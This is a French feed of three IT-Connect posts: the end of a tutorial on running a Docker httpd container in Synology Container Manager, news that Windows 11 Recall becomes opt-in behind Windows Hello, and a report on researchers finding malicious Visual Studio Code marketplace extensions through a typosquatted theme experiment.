1 - Cliquez sur "Panneau de configuration" puis "Utilisateur et groupe".

2 - Cliquez sur le bouton "Créer" à partir de l'onglet "Utilisateur".

3 - Indiquez un nom, par exemple "docker", ainsi qu'une description et un mot de passe (que vous stockez dans votre coffre-fort de mots de passe). Cochez également l'option "Ne pas autoriser l'utilisateur à changer le mot de passe du compte".

4 - Ajoutez l'utilisateur au groupe "users" (ou à votre groupe "docker" si vous l'avez créé en amont).

5 - Attribuer les permissions de lecture et écriture sur le dossier partagé "docker" à cet utilisateur.

6 - Passez l'étape correspondante à la gestion du quota.

7 - Refusez l'accès, de façon explicite, à toutes les applications. Cet utilisateur n'a aucune raison d'avoir accès à l'interface DSM ou à d'autres fonctions.

8 - Poursuivez jusqu'à la fin pour créer l'utilisateur.

Voilà, le compte utilisateur pour Docker a été créé ! Il ne restera plus qu'à récupérer l'UID et le GID pour les spécifier dans un conteneur qui doit être exécuté avec ce compte. Pour cela, référez-vous à ce tutoriel :

• NAS Synology : comment obtenir l'UID et le GID d'un utilisateur ?

Voici un exemple pour le mappage du répertoire de données dans un conteneur, ainsi que de l'utilisation de l'utilisateur "docker" pour exécuter un conteneur Docker :

VI. Déployer un premier conteneur

Pour que vous puissiez faire vos premiers pas avec le déploiement d'un conteneur Docker sur un NAS Synology, nous allons faire simple et déployer un conteneur basé sur l'image "httpd". Ceci correspond à un serveur web Apache2.

Nous allons créer un répertoire nommé "httpd" dans "docker". Puis, dans le répertoire "httpd", nous allons créer le répertoire "websites" qui sera destiné à stocker les données de notre site web statique. Notre conteneur sera basé sur l'image "httpd" visible sur l'image ci-dessous.

Désormais, nous allons pouvoir créer ce nouveau conteneur Apache2. Suivez les étapes suivantes :

1 - À partir de l'interface "Container Manager", cliquez sur "Projet" puis sur le bouton "Créer".

2 - Nommez ce projet "apache2_httpd" puis indiquez "/docker/httpd" comme chemin.

Vous devez également indiquer le contenu de votre fichier "docker-compose.yml". Pour déployer un serveur Apache à partir de l'image la plus récente ("image: httpd:latest") dans un conteneur nommé "httpd-website", voici le code à utiliser :

version: '3.9'
services:
  apache:
    image: httpd:latest
    container_name: httpd-website
    ports:
    - '9090:80'
    volumes:
    - /volume1/docker/httpd/websites:/usr/local/apache2/htdocs

Il y a également deux directives pour effectuer le mappage du port et du stockage :

• Le conteneur sera accessible sur le port 9090 en externe, tandis que le port interne est 80 (http).

    ports:
    - '9090:80'

• Le répertoire "/usr/local/apache2/htdocs" du conteneur et correspondant à la racine du serveur Web, sera mappé avec le répertoire "/volume1/docker/httpd/websites" du NAS.

    volumes:
    - /volume1/docker/httpd/websites:/usr/local/apache2/htdocs

Ce qui donne :

Remarque : pour obtenir le fichier de configuration Docker Compose d'une application, consultez la documentation officielle de l'application en question. En général, il y a des instructions puisque ce type de configuration tend à se démocratiser.

Vous pouvez continuer jusqu'à la fin et valider.

Container Manager va télécharger l'image associée à notre projet et construire le conteneur associé.

Une fois que ce sera terminé, le conteneur Apache2 sera actif et accessible. Le statut global du projet est visible dans "Projet", tandis que le statut du conteneur "httpd-website" est visible dans "Conteneur". Cette section permet d'afficher le statut par conteneur, car un projet peut regrouper plusieurs conteneurs. Dans la section "Image", celle correspondante au conteneur Apache2 a bien été téléchargée.

À partir de "Projet", si vous cliquez sur le nom du projet, vous pouvez obtenir des informations très intéressantes :

• Conteneurs : la liste des conteneurs associés à ce projet avec le statut correspondant
• Statistiques : les ressources consommées (CPU, RAM, réseau)
• Configurations YAML : le code du fichier docker-compose.yml de ce projet. Vous pouvez l'éditer quand le projet (et donc les conteneurs) est arrêté.
• Paramètres : publier ce conteneur via l'application Web Station de DSM. Pour avoir des paramètres avancés, il faut cliquer sur le conteneur via le menu "Conteneur", sans passer par "Projet".

Désormais, nous allons tenter d'accéder à la page d'accueil de notre serveur web Apache2.

À partir d'un navigateur, il est possible d'accéder à notre serveur web Apache2. Il suffit de saisir l'adresse IP du NAS, suivie par le numéro de port 9090. Actuellement, il n'y a aucun fichier, donc la page web affiche la directive "Index of /".

Dans le répertoire "websites" de votre NAS, vous pouvez déposer un ou plusieurs fichiers.

Par exemple, voici un fichier nommé "index.html" avec le code suivant :

<html>
<body>
<h1>Demo IT-Connect</h1>
</body>
</html>

Le fichier "index.html" a été copié dans le répertoire "/docker/httpd/websites". Désormais la page retournée est différente :

Notre conteneur Apache2 est opérationnel !

VII. Conclusion

J'espère que cet article d'introduction à Container Manager vous permettra de bien prendre en main la gestion des conteneurs Docker ! C'est une fonctionnalité très utile du système DSM et qui ouvre la porte à l'hébergement de nombreuses applications sur votre NAS ! Il y a beaucoup à dire et chaque conteneur peut avoir ses particularités, donc il y aura probablement des articles complémentaires à celui-ci, ainsi que des articles spécifiques pour déployer diverses applications.

N'hésitez pas à commenter cet article si vous avez des questions ou des idées d'amélioration.

The post NAS Synology – Prise en main de Container Manager pour créer des conteneurs Docker first appeared on IT-Connect.

Suite à l'annonce de sa fonctionnalité Recall pour Windows 11, Microsoft a suscité de l'inquiétude chez ses utilisateurs. L'entreprise américaine est revenue sur sa décision : Recall ne sera pas activé par défaut.

Fin mai, à l'occasion de son événement Windows 11 AI, Microsoft a dévoilé son programme de PC Copilot+ pour l'IA, ainsi qu'une nouvelle fonctionnalité : Recall pour Windows 11.

Une fonctionnalité à la fois innovante et inquiétante qui est comme une seconde mémoire pour l'utilisateur : elle va enregistrer en continu les actions effectuées sur le PC, de façon à analyser et à classer les informations pour vous permettre d'y accéder plus facilement. Il est même question que Recall effectue des captures d'écran pour permettre à l'utilisateur de naviguer dans l'historique de ses actions de façon chronologique. L'objectif étant de permettre à l'utilisateur de retrouver facilement une information, un fichier, etc.

Forcément, ceci a posé de nombreuses questions autour de la confidentialité et du traitement des données, bien que Microsoft assure que tout est effectué et stocké en local. L'entreprise américaine a également indiqué qu'il serait possible de créer une liste noire de sites web à ne pas capturer, au sein de Microsoft Edge. Les sessions de navigation privée sont aussi exclues.

Recall : ce qu'il faut savoir pour le lancement prévu le 18 juin 2024

Microsoft souhaite réussir le lancement de Recall, prévu pour le 18 juin 2024, sur les PC Copilot+ (une simple manipulation donne accès à cette fonction sur les autres appareils). Afin de rassurer ses utilisateurs, la firme de Redmond a pris une décision forte : Recall ne sera pas activé par défaut, ce sera à l'utilisateur de prendre la décision de l'activer. C'est un changement de position vis-à-vis de ce qui était prévu initialement.

De plus, Microsoft a pris la décision d'associer Windows Hello à Recall pour protéger l'accès aux informations enregistrées. Pour rappel, Windows Hello est la fonction de reconnaissance biométrique intégrée à Windows. Cela signifie que pour activer Recall, l'utilisateur devra configurer Windows Hello.

Par la suite, lorsque l'utilisateur souhaitera accéder à son historique Recall, il devra également s'authentifier avec Windows Hello. Ce n'est qu'une fois que l'authentification sera réussie que les données de Recall seront déchiffrées. Effectivement, Microsoft a pris la décision de chiffrer les données associées à Recall, ce qui est indispensable compte tenu des précieuses informations que peut contenir cette base de données.

"L'inscription à Windows Hello est nécessaire pour activer Recall. En outre, une preuve de présence est également requise pour afficher votre chronologie et effectuer des recherches dans Recall." - Ceci implique d'avoir un ordinateur avec une caméra compatible Windows Hello, ce qui est loin d'être le cas de tous les modèles. Les propriétaires d'appareils Microsoft Surface bénéficient de cet avantage, bien que ce ne soient pas les seuls.

Enfin, Microsoft insiste sur le fait que les instantanés de vos actions sont enregistrés en local, ne sont pas partagés et "vous pouvez mettre en pause, filtrer et supprimer ce qui est enregistré à tout moment."

Qu'en pensez-vous ?

Source

The post Windows 11 : finalement, la fonction Recall ne sera pas obligatoire ! first appeared on IT-Connect.

La marketplace de Visual Studio Code est très utile pour ajouter des fonctionnalités à l'éditeur de code de Microsoft et le personnaliser, notamment avec des thèmes. Néanmoins, c'est aussi un nid à malwares : des chercheurs en sécurité ont identifié des milliers d'extensions malveillantes ! Faisons le point.

Pour rappel, Visual Studio Code est un éditeur de code gratuit et open source développé par Microsoft. Il prend en charge de nombreux langages, notamment PowerShell et Python, et il est très utilisé par les professionnels de l'IT.

Par l'intermédiaire de la marketplace pour Visual Studio Code, Microsoft distribue des extensions pour VSCode afin de lui ajouter des fonctionnalités et de personnaliser son apparence. Les membres de la communauté peuvent, eux aussi, publier du contenu sur cette marketplace : les cybercriminels l'ont bien compris et en profitent également.

Visual Studio Code et la menace du typosquatting

Récemment, trois chercheurs en sécurité israéliens, Amit Assaraf, Itay Kruk, et Idan Dardikman, ont mené une expérience. Ils ont créé une version malveillante du thème "Dracula Official", l'un des éléments de la marketplace les plus populaires (plus de 7 millions de téléchargements).

Ils ont repris le code d'origine de l'extension et ils ont ajouté un script supplémentaire pour collecter des informations sur le système de l'utilisateur. Les informations collectées sont envoyées sur un serveur via HTTPS. Leur version de ce thème ne s'appelle pas "Dracula Official" mais "Darcula Official" (subtile !) et elle reprend le même logo, ainsi que le domaine "darculatheme.com" qui ajoute de la crédibilité. Ils sont parvenus à publier cette extension sur la marketplace de Visual Studio Code.

24 heures plus tard, il y avait déjà plus de 100 installations, c'est-à-dire 100 ordinateurs qui pourraient potentiellement être compromis s'il y avait un réel code malveillant. "Nous avons remarqué qu'une victime avait été identifiée comme étant une machine Windows dans le domaine et le réseau d'une société cotée en bourse dont la capitalisation boursière s'élève à 483 milliards de dollars.", précise les chercheurs en sécurité.

Étant donné que Visual Studio Code est destiné à exécuter du code divers et variés, à exécuter des processus, etc... Il est difficile de déterminer si son activité est malveillante ou non.

À ce sujet, les chercheurs en sécurité apportent des précisions au sein de leur article disponible sur Medium : "Malheureusement, les outils traditionnels de sécurité des terminaux (EDR) ne détectent pas cette activité (comme nous l'avons montré pour certaines organisations dans le cadre du processus de divulgation responsable). VSCode est conçu pour lire de nombreux fichiers, exécuter de nombreuses commandes et créer des processus enfants, de sorte que les EDR ne peuvent pas déterminer si l'activité de VSCode est une activité de développeur légitime ou une extension malveillante."

Attention à la marketplace de Visual Studio Code

À l'aide d'un outil qu'ils ont développé, les trois chercheurs sont parvenus à analyser en profondeur le contenu publié sur la marketplace de Visual Studio Code. Ils sont parvenus à identifier :

• 1 283 extensions contenant des dépendances malveillantes connues, pour un total de 229 millions d'installations
• 87 extensions qui tentent de lire le fichier /etc/passwd sur le système hôte.
• 8161 extensions qui communiquent avec une adresse IP codée en dur à partir d'un code JS.
• 1 452 extensions qui exécutent un binaire exécutable inconnu ou une DLL sur la machine hôte.
• 267 extensions contiennent des secrets vérifiés codés en dur.
• Le code et les ressources de 145 extensions ont été signalés comme malveillant par VirusTotal.
• 2 304 extensions qui utilisent le dépôt Github d'un autre éditeur comme dépôt officiel, ce qui implique des extensions copiées.

Des chiffres alarmants et qui montrent qu'il faut être vigilant avant d'installer une extension sur sa machine. Il est temps que Microsoft améliore son processus de validation et effectue un nettoyage sur cette marketplace... En attendant, l'outil d'analyse des chercheurs en sécurité devrait être publié dans les prochaines semaines.

Finalement, l'ensemble des marketplaces et plateformes de dépôts officielles peuvent être utilisées pour distribuer des logiciels malveillants : PyPI pour les projets Python, Docker Hub pour les images de conteneurs, ou encore le catalogue de Visual Studio Code sont des exemples parmi d'autres....

Source

The post La Marketplace de Visual Studio Code est truffée d’extensions malveillantes installées par millions ! first appeared on IT-Connect.